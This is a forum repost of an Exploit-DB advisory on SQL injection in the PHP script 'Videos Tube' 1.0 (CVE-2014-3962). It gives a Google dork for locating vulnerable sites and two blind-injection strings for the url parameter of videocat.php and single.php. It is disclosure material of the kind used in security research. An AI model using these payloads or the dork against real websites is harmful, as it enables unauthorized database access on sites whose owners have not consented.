- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 33514
- Проверка EDB
-
- Пройдено
- Автор
- MUSTAFA ALTINKAYNAK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2014-3962
- Дата публикации
- 2014-05-26
Код:
# Exploit Title: Videos Tube SQL Injection and Remote Code Execution
# Google Dork: inurl:"single.php?url=" video
# Date: 05.05.2014
# Exploit Author: Mustafa ALTINKAYNAK
# Vendor Homepage: http://www.phpscriptlerim.com
# Software Link: http://demo.phpscriptlerim.com/free/videostube/
# Version: 1.0
Description (Açıklama)
========================
Category, showing video on the page are two types of SQL injection. Boolean-based blind and AND / OR time-based blind. Incoming data can be filtered off light.
Vulnerability
========================
1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMAP Tool)
2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool)- Источник
- www.exploit-db.com
